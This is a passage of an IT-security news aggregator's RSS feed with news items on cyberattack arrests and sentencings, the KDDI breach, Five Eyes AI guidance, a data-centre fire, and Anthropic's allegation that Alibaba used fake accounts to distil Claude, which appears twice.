data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The overarching theme in this weekly roundup is the erosion of response time in modern <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28834">cybersecurity</a> environments. Intelligence agencies, law enforcement bodies, and private-sector disclosures collectively point to a landscape where attackers are leveraging AI-enabled capabilities, third-party system weaknesses, and identity compromise to gain persistence across networks. At the same time, regulators and courts are beginning to define new boundaries for both <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28836">cybercrime</a> accountability and the operational use of AI in sensitive domains.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">The Cyber Express Weekly Roundup</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<h4 aria-level="3"><b><span data-contrast="none">Five Eyes Warn AI Is Rapidly Outdating Cyber Risk Models</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">The Five Eyes cybersecurity agencies warn that artificial intelligence is accelerating cyber threats and making traditional cyber <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risk" data-wpil-keyword-link="linked" data-wpil-monitor-id="28837">risk</a> assumptions obsolete. Attackers are exploiting <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28839">vulnerabilities</a> faster, shrinking response windows, and increasing the speed and sophistication of attacks. In guidance issued on June 23, 2026, they urged organizations to treat <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28842">cyber</a> resilience as a leadership priority, strengthen identity and access controls, accelerate patching cycles, and reduce dependence on legacy systems. </span><strong><a href="https://thecyberexpress.com/ai-cyber-risk-warning/"><i>Read more…</i></a> </strong>
<h4 aria-level="3"><b><span data-contrast="none">TfL Hackers Plead Guilty After £29M Cyberattack</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">Two members of the <a href="https://cyble.com/threat-actor-profiles/scattered-spider/" target="_blank" rel="nofollow noopener">Scattered Spider</a> cybercrime group have pleaded guilty to roles in the Transport for London cyberattack that caused £29 million in losses, disrupted services, and exposed customer data. The 2024 breach affected Oyster systems and forced mass password resets across TfL’s workforce. Investigators also linked the suspects to other attempted intrusions targeting U.S. healthcare networks. </span><strong><a href="https://thecyberexpress.com/transport-for-london-cyberattack-plead-guilty/"><i>Read more…</i></a> </strong>
<h4 aria-level="3"><b><span data-contrast="none">KDDI Data Breach May Expose 14.22 Million Email Accounts</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">KDDI has disclosed a cybersecurity incident that may have exposed up to 14.22 million email addresses and passwords through systems used by multiple Japanese <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28841">internet</a> service providers. The breach, detected on June 17, 2026, stemmed from unauthorized access to a third-party email system. KDDI said it has secured the affected environment, notified partners, and is working with regulators while urging users to reset passwords as a precaution. </span><strong><a href="https://thecyberexpress.com/kddi-data-breach-14-million-email-leak-2026/"><i>Read more…</i></a> </strong>
<h4 aria-level="3"><b><span data-contrast="none">Garfield AI Wins Landmark UK Case as AI-Powered Law Firm</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">Garfield AI, a UK-regulated AI-powered law firm, has secured a landmark legal victory after successfully managing a small claims case in England with minimal human intervention. The AI system handled pre-trial work, including drafting court documents and preparing evidence, in a dispute over an unpaid £7,000 invoice. The case was ultimately won at Wandsworth County Court, marking a notable milestone for the use of AI in regulated legal services, though human counsel still represented the claimant at trial. </span><strong><a href="https://thecyberexpress.com/ai-powered-law-firm-wins-court-case/"><i>Read more…</i></a> </strong>
<h4 aria-level="3"><b><span data-contrast="none">Iranian Hacker Arrested in Montenegro Over Alleged $3.4B Cyberattack Campaign</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">An alleged Iranian <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-hacker/" title="hacker" data-wpil-keyword-link="linked" data-wpil-monitor-id="28838">hacker</a> has been arrested in Montenegro following a joint operation with the FBI over a long-running cyber campaign targeting U.S. infrastructure. Authorities say the 39-year-old suspect is linked to attacks dating back to 2013, allegedly targeting more than 150 U.S. universities and causing over $3.4 billion in damages. He now faces extradition to the United States on charges including computer fraud, <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-hacking/" title="hacking" data-wpil-keyword-link="linked" data-wpil-monitor-id="28835">hacking</a>, conspiracy, and identity theft, while investigations into Iran-linked cyber activity continue. </span><strong><a href="https://thecyberexpress.com/iranian-hacker-arrested/"><i>Read more…</i></a> </strong>
<h3 aria-level="2"><b><span data-contrast="none">Weekly Cybersecurity Takeaway</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">This week’s weekly roundup reflects a cybersecurity environment increasingly defined by the speed of AI-driven threat evolution, the scale of third-party exposure, and the persistence of long-running cybercrime operations. From the Five Eyes warning that artificial intelligence is rapidly reshaping cyber risk assumptions to the KDDI breach that may have exposed 14.22 million email accounts, organizations are facing mounting pressure to modernize defenses while reducing dependence on outdated <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28840">security</a> models.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Iranian Hacker Arrested Over Alleged $3.4 Billion Cyberattack on USA Infrastructure]]></title>
<description><![CDATA[An alleged Iranian hacker accused of hacking US infrastructure has been arrested in Montenegro following a joint operation by Montenegrin police and the U.S. Federal Bureau of Investigation (FBI). The suspect is expected to face charges related to computer fraud, hacking, conspiracy, and identity...]]></description>
<link>https://tsecurity.de/de/3626612/it-security-nachrichten/iranian-hacker-arrested-over-alleged-34-billion-cyberattack-on-usa-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626612/it-security-nachrichten/iranian-hacker-arrested-over-alleged-34-billion-cyberattack-on-usa-infrastructure/</guid>
<pubDate>Fri, 26 Jun 2026 09:35:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1217" height="768" src="https://thecyberexpress.com/wp-content/uploads/Iranian-hacker.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Iranian hacker" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Iranian-hacker.webp 1217w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-300x189.webp 300w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-1024x646.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-768x485.webp 768w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-600x379.webp 600w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-150x95.webp 150w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-750x473.webp 750w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-1140x719.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker.webp 1217w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-300x189.webp 300w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-1024x646.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-768x485.webp 768w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-600x379.webp 600w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-150x95.webp 150w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-750x473.webp 750w, https://thecyberexpress.com/wp-content/uploads/Iranian-hacker-1140x719.webp 1140w" sizes="(max-width: 1217px) 100vw, 1217px" title="Iranian Hacker Arrested Over Alleged $3.4 Billion Cyberattack on USA Infrastructure 1"></p><span data-contrast="auto">An alleged Iranian hacker accused of hacking US infrastructure has been arrested in Montenegro following a joint operation by Montenegrin police and the U.S. Federal Bureau of Investigation (FBI). The suspect is expected to face charges related to computer fraud, hacking, conspiracy, and identity theft after authorities linked him to a years-long cyber campaign that reportedly caused more than $3.4 billion in damages.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Iranian Hacker Faces Computer Fraud and Hacking Charges</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The <a href="https://www.devdiscourse.com/article/law-order/3941094-interim-us-iran-peace-accord-a-crucial-step-for-international-inspection" target="_blank" rel="nofollow noopener">39-year-old suspect</a>, who holds dual Iranian and Turkish citizenship, was arrested in the Adriatic coastal town of Kotor, Montenegro. According to local police, he is wanted by the Southern District Court of New York on charges of conspiracy to commit computer fraud, <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-hacking/" title="hacking" data-wpil-keyword-link="linked" data-wpil-monitor-id="28823">hacking</a>, and identity theft.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The case will now be referred to a High Court judge in Montenegro's capital, Podgorica, where extradition proceedings are expected to begin.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Alleged Cyberattack on USA Universities Caused Billions in Damage</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">In an official statement, Montenegro's police directorate alleged that the Iranian <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-hacker/" title="hacker" data-wpil-keyword-link="linked" data-wpil-monitor-id="28828">hacker</a> had been involved in large-scale hacking operations since 2013.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">"From 2013 onward, … he carried out massive hacking attacks … targeting more than 150 universities in the United States, causing damage estimated at over $3.4 billion," the statement said.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Authorities claim the <a href="https://thecyberexpress.com/international-takedown-of-cracked-and-nulled/" target="_blank" rel="noopener">stolen data</a> and access to compromised university accounts were used to benefit Iran's Islamic Revolutionary Guard Corps (IRGC) and other Iranian organizations, including universities. Investigators allege the campaign formed part of a</span><span data-contrast="auto"> </span><span data-contrast="auto">broader <a class="wpil_keyword_link" href="https://cyble.com/cyberattack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28822">cyberattack</a> on USA institutions aimed at acquiring sensitive academic data and digital access.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Extradition Process Underway</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Following the arrest, Montenegrin authorities confirmed that the suspect remains in custody while legal proceedings continue. If approved, he will be extradited to the United States to face charges tied to computer <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28829">fraud</a>, identity theft, and extensive hacking operations.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The FBI participated in the investigation that led to the arrest, although the agency was not immediately available for comment after the <a class="wpil_keyword_link" href="https://cyble.com/announcement/" target="_blank" rel="noopener" title="announcement" data-wpil-keyword-link="linked" data-wpil-monitor-id="28826">announcement</a>.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Iranian Cyber Operations Remain Under Scrutiny</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The latest arrest comes amid continued concerns over Iranian-linked <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28827">cyber</a> activity. Iran and the IRGC have long been associated with <a href="https://thecyberexpress.com/coldriver-new-malware-after-lostkeys-exposure/" target="_blank" rel="noopener">state-sponsored cyber operations</a> targeting U.S. organizations and infrastructure.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">In April, U.S. <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28825">cybersecurity</a>, intelligence, and law enforcement agencies warned that Iranian hacking campaigns targeting equipment across critical U.S. infrastructure had intensified. The warning highlighted an increase in attempted intrusions, reinforcing concerns over future cyberattacks on the USA.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The arrest marks a new development in an international investigation into one of the largest alleged <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28824">cybercrime</a> cases involving an Iranian hacker, with prosecutors pursuing charges that include conspiracy, computer fraud, hacking, and identity theft linked to billions of dollars in reported losses.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Delhi Data Centre Fire Disrupts Google Cloud Services]]></title>
<description><![CDATA[Fire at facility owned by Tata and STT Telemedia reportedly causes ongoing Google Cloud latency, raises fears of decades of data loss This article has been indexed from Silicon UK Read the original article: New Delhi Data Centre Fire Disrupts…
Read more →
The post New Delhi Data Centre Fire Disru...]]></description>
<link>https://tsecurity.de/de/3625441/it-security-nachrichten/new-delhi-data-centre-fire-disrupts-google-cloud-services/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625441/it-security-nachrichten/new-delhi-data-centre-fire-disrupts-google-cloud-services/</guid>
<pubDate>Thu, 25 Jun 2026 19:24:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fire at facility owned by Tata and STT Telemedia reportedly causes ongoing Google Cloud latency, raises fears of decades of data loss This article has been indexed from Silicon UK Read the original article: New Delhi Data Centre Fire Disrupts…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-delhi-data-centre-fire-disrupts-google-cloud-services/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-delhi-data-centre-fire-disrupts-google-cloud-services/">New Delhi Data Centre Fire Disrupts Google Cloud Services</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Delhi Data Centre Fire Disrupts Cloud Services]]></title>
<description><![CDATA[Fire at facility owned by Tata and STT Telemedia reportedly causes ongoing Google Cloud latency, raises fears of decades of data loss This article has been indexed from Silicon UK Read the original article: New Delhi Data Centre Fire Disrupts…
Read more →
The post New Delhi Data Centre Fire Disru...]]></description>
<link>https://tsecurity.de/de/3624271/it-security-nachrichten/new-delhi-data-centre-fire-disrupts-cloud-services/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624271/it-security-nachrichten/new-delhi-data-centre-fire-disrupts-cloud-services/</guid>
<pubDate>Thu, 25 Jun 2026 13:23:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fire at facility owned by Tata and STT Telemedia reportedly causes ongoing Google Cloud latency, raises fears of decades of data loss This article has been indexed from Silicon UK Read the original article: New Delhi Data Centre Fire Disrupts…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-delhi-data-centre-fire-disrupts-cloud-services/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-delhi-data-centre-fire-disrupts-cloud-services/">New Delhi Data Centre Fire Disrupts Cloud Services</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic accuses Alibaba of using 25,000 fake accounts to scrape Claude AI]]></title>
<description><![CDATA[Anthropic has accused Alibaba of using nearly 25,000 fraudulent accounts to extract capabilities from its Claude AI models, in what the US AI company described as the largest known attack of its kind against it.



The campaign, carried out between April 22 and June 5, generated more than 28.8 mi...]]></description>
<link>https://tsecurity.de/de/3624147/ai-nachrichten/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624147/ai-nachrichten/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai/</guid>
<pubDate>Thu, 25 Jun 2026 12:48:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Anthropic has accused Alibaba of using nearly 25,000 fraudulent accounts to extract capabilities from its Claude AI models, in what the US AI company described as the largest known attack of its kind against it.</p>



<p>The campaign, carried out between April 22 and June 5, generated more than 28.8 million exchanges with Claude, according to a June 10 letter Anthropic sent to senior members of the US Senate Banking Committee, <a href="https://www.reuters.com/world/china/anthropic-says-alibaba-illicitly-extracted-claude-ai-model-capabilities-2026-06-24/" target="_blank" rel="noreferrer noopener">Reuters reported</a>.</p>



<p>Anthropic said the effort involved “distillation,” a technique in which a less capable AI model is trained on the outputs of a more advanced system, potentially allowing rivals to replicate some of its capabilities at lower cost.</p>



<p>The company said the campaign was conducted by operators affiliated with Alibaba and Alibaba Qwen, Alibaba’s AI lab, according to the report.</p>



<p>The allegation comes as businesses adopt generative AI tools across business functions, putting pressure on vendors to show they can detect misuse while keeping services available for corporate customers.</p>



<p>The dispute also comes as AI development becomes more closely tied to <a href="https://www.computerworld.com/article/4149313/chinas-use-of-open%E2%80%91source-ai-threatens-the-us-lead-in-ai-development-us-commission-warns.html">US-China technology tensions</a>. Anthropic said the alleged campaign could help accelerate China’s ability to reach the capabilities of its advanced <a href="https://www.computerworld.com/article/4162278/claude-mythos-signals-a-new-era-in-ai-driven-security-finding-271-flaws-in-firefox-3.html">Mythos Preview</a> model, while US officials have stepped up scrutiny of advanced AI systems over fears they could be used by military or intelligence users in countries of concern.</p>



<p>In February, Anthropic said it had identified similar campaigns by DeepSeek, Moonshot AI, and MiniMax to extract capabilities from Claude, with the alleged activity ranging from more than 150,000 exchanges by DeepSeek to more than 13 million by MiniMax.</p>



<p>Alibaba did not immediately respond to a request for comment.</p>



<h2 class="wp-block-heading">A new supply chain risk</h2>



<p>If Anthropic’s claims are true, the alleged campaign could allow Alibaba to build a comparable model in a short period of time and offer it at a much lower cost, said <a href="https://www.techinsights.com/experts/Anand-Joshi" target="_blank" rel="noreferrer noopener">Anand Joshi</a>, an AI analyst at TechInsights.</p>



<p>Analysts said the alleged campaign also points to a broader pattern beyond the two companies. Viewed alongside previous incidents cited by Anthropic, they said, model extraction appears to be escalating rather than remaining an isolated risk.</p>



<p>“The enterprise supply chain no longer ends at software, APIs, and cloud regions,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “It now includes rented intelligence, and rented intelligence can be copied and redeployed well outside the safety controls it was born with.”</p>



<p>Gogia said distillation should be a board-level concern because a weaker model trained on a stronger one can inherit its capabilities without the governance and controls around the original system.</p>



<p>For enterprises, the allegations point to a potentially more serious risk than conventional intellectual property theft: reverse engineering at scale. If proven, they would suggest that AI models can be copied systematically, turning model extraction into a new AI supply-chain risk.</p>



<p>“If a rival can clone the exact brain of the AI your company relies on, they can easily find its blind spots, hack your automated systems, or cause the AI vendor to panic and shut down services that your business needs to run every day,” said <a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting.</p>



<h2 class="wp-block-heading">Mitigating the risks</h2>



<p><br>The allegation raises questions about the controls AI vendors have in place and how customers can protect themselves.</p>



<p>“Vendors should provide verified accounts, smart rate limits, abuse detection, usage monitoring, contractual bans on distillation, incident disclosure, and audit rights,” Jain said. “Enterprises should ask how the vendor detects and blocks large-scale model extraction and can demand contracts that guarantee backup plans and financial refunds if the AI service gets attacked or suddenly shut down.”</p>



<p>Joshi said enterprise customers should also press vendors for greater transparency around model development and safeguards.</p>



<p>“Enterprise buyers should ask what training data was used, how it was trained, what guardrails exist, how they can audit it, and so on,” Joshi said. “Model publishers will have to come up with watermarking technology in models as well as model responses. So if the model ‘skills’ are stolen, they should be able to find the thief.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic accuses Alibaba of using 25,000 fake accounts to scrape Claude AI]]></title>
<description><![CDATA[Anthropic has accused Alibaba of using nearly 25,000 fraudulent accounts to extract capabilities from its Claude AI models, in what the US AI company described as the largest known attack of its kind against it.



The campaign, carried out between April 22 and June 5, generated more than 28.8 mi...]]></description>
<link>https://tsecurity.de/de/3624110/it-nachrichten/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624110/it-nachrichten/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai/</guid>
<pubDate>Thu, 25 Jun 2026 12:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Anthropic has accused Alibaba of using nearly 25,000 fraudulent accounts to extract capabilities from its Claude AI models, in what the US AI company described as the largest known attack of its kind against it.</p>



<p>The campaign, carried out between April 22 and June 5, generated more than 28.8 million exchanges with Claude, according to a June 10 letter Anthropic sent to senior members of the US Senate Banking Committee, <a href="https://www.reuters.com/world/china/anthropic-says-alibaba-illicitly-extracted-claude-ai-model-capabilities-2026-06-24/" target="_blank" rel="noreferrer noopener">Reuters reported</a>.</p>



<p>Anthropic said the effort involved “distillation,” a technique in which a less capable AI model is trained on the outputs of a more advanced system, potentially allowing rivals to replicate some of its capabilities at lower cost.</p>



<p>The company said the campaign was conducted by operators affiliated with Alibaba and Alibaba Qwen, Alibaba’s AI lab, according to the report.</p>



<p>The allegation comes as businesses adopt generative AI tools across business functions, putting pressure on vendors to show they can detect misuse while keeping services available for corporate customers.</p>



<p>The dispute also comes as AI development becomes more closely tied to <a href="https://www.computerworld.com/article/4149313/chinas-use-of-open%E2%80%91source-ai-threatens-the-us-lead-in-ai-development-us-commission-warns.html">US-China technology tensions</a>. Anthropic said the alleged campaign could help accelerate China’s ability to reach the capabilities of its advanced <a href="https://www.computerworld.com/article/4162278/claude-mythos-signals-a-new-era-in-ai-driven-security-finding-271-flaws-in-firefox-3.html">Mythos Preview</a> model, while US officials have stepped up scrutiny of advanced AI systems over fears they could be used by military or intelligence users in countries of concern.</p>



<p>In February, Anthropic said it had identified similar campaigns by DeepSeek, Moonshot AI, and MiniMax to extract capabilities from Claude, with the alleged activity ranging from more than 150,000 exchanges by DeepSeek to more than 13 million by MiniMax.</p>



<p>Alibaba did not immediately respond to a request for comment.</p>



<h2 class="wp-block-heading">A new supply chain risk</h2>



<p>If Anthropic’s claims are true, the alleged campaign could allow Alibaba to build a comparable model in a short period of time and offer it at a much lower cost, said <a href="https://www.techinsights.com/experts/Anand-Joshi" target="_blank" rel="noreferrer noopener">Anand Joshi</a>, an AI analyst at TechInsights.</p>



<p>Analysts said the alleged campaign also points to a broader pattern beyond the two companies. Viewed alongside previous incidents cited by Anthropic, they said, model extraction appears to be escalating rather than remaining an isolated risk.</p>



<p>“The enterprise supply chain no longer ends at software, APIs, and cloud regions,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “It now includes rented intelligence, and rented intelligence can be copied and redeployed well outside the safety controls it was born with.”</p>



<p>Gogia said distillation should be a board-level concern because a weaker model trained on a stronger one can inherit its capabilities without the governance and controls around the original system.</p>



<p>For enterprises, the allegations point to a potentially more serious risk than conventional intellectual property theft: reverse engineering at scale. If proven, they would suggest that AI models can be copied systematically, turning model extraction into a new AI supply-chain risk.</p>



<p>“If a rival can clone the exact brain of the AI your company relies on, they can easily find its blind spots, hack your automated systems, or cause the AI vendor to panic and shut down services that your business needs to run every day,” said <a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting.</p>



<h2 class="wp-block-heading">Mitigating the risks</h2>



<p><br>The allegation raises questions about the controls AI vendors have in place and how customers can protect themselves.</p>



<p>“Vendors should provide verified accounts, smart rate limits, abuse detection, usage monitoring, contractual bans on distillation, incident disclosure, and audit rights,” Jain said. “Enterprises should ask how the vendor detects and blocks large-scale model extraction and can demand contracts that guarantee backup plans and financial refunds if the AI service gets attacked or suddenly shut down.”</p>



<p>Joshi said enterprise customers should also press vendors for greater transparency around model development and safeguards.</p>



<p>“Enterprise buyers should ask what training data was used, how it was trained, what guardrails exist, how they can audit it, and so on,” Joshi said. “Model publishers will have to come up with watermarking technology in models as well as model responses. So if the model ‘skills’ are stolen, they should be able to find the thief.”</p>



<p><em>The article originally appeared on <a href="https://www.infoworld.com/article/4189342/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker gets 18 months for attack that compromised 60,000 betting accounts]]></title>
<description><![CDATA[A 21-year-old man known online as “Snoopy” was sentenced to 18 months in prison for his role in a scheme that hacked user accounts on a fantasy sports and betting website and sold access to them, causing hundreds of thousands of dollars in losses. Nathan Austad of Farmington, Minnesota, pleaded g...]]></description>
<link>https://tsecurity.de/de/3624094/it-security-nachrichten/hacker-gets-18-months-for-attack-that-compromised-60000-betting-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624094/it-security-nachrichten/hacker-gets-18-months-for-attack-that-compromised-60000-betting-accounts/</guid>
<pubDate>Thu, 25 Jun 2026 12:22:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A 21-year-old man known online as “Snoopy” was sentenced to 18 months in prison for his role in a scheme that hacked user accounts on a fantasy sports and betting website and sold access to them, causing hundreds of thousands of dollars in losses. Nathan Austad of Farmington, Minnesota, pleaded guilty in December 2025 to one count of conspiracy to commit computer intrusion. According to prosecutors, Austad and his co-conspirators launched a credential stuffing attack … <a href="https://www.helpnetsecurity.com/2026/06/25/hacker-sentenced-draftkings-credential-stuffing-attac/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/25/hacker-sentenced-draftkings-credential-stuffing-attac/">Hacker gets 18 months for attack that compromised 60,000 betting accounts</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs rethink the balance between AI oversight and innovation]]></title>
<description><![CDATA[The new CIO mandate is clear: facilitate AI adoption across the enterprise at speed.



According to CIO.com’s State of the CIO survey, CEOs’ top priority for their IT executives is to capitalize on AI. From researching to evaluating AI products, CIOs are now the central figures in their organiza...]]></description>
<link>https://tsecurity.de/de/3624049/it-security-nachrichten/cios-rethink-the-balance-between-ai-oversight-and-innovation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624049/it-security-nachrichten/cios-rethink-the-balance-between-ai-oversight-and-innovation/</guid>
<pubDate>Thu, 25 Jun 2026 12:08:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
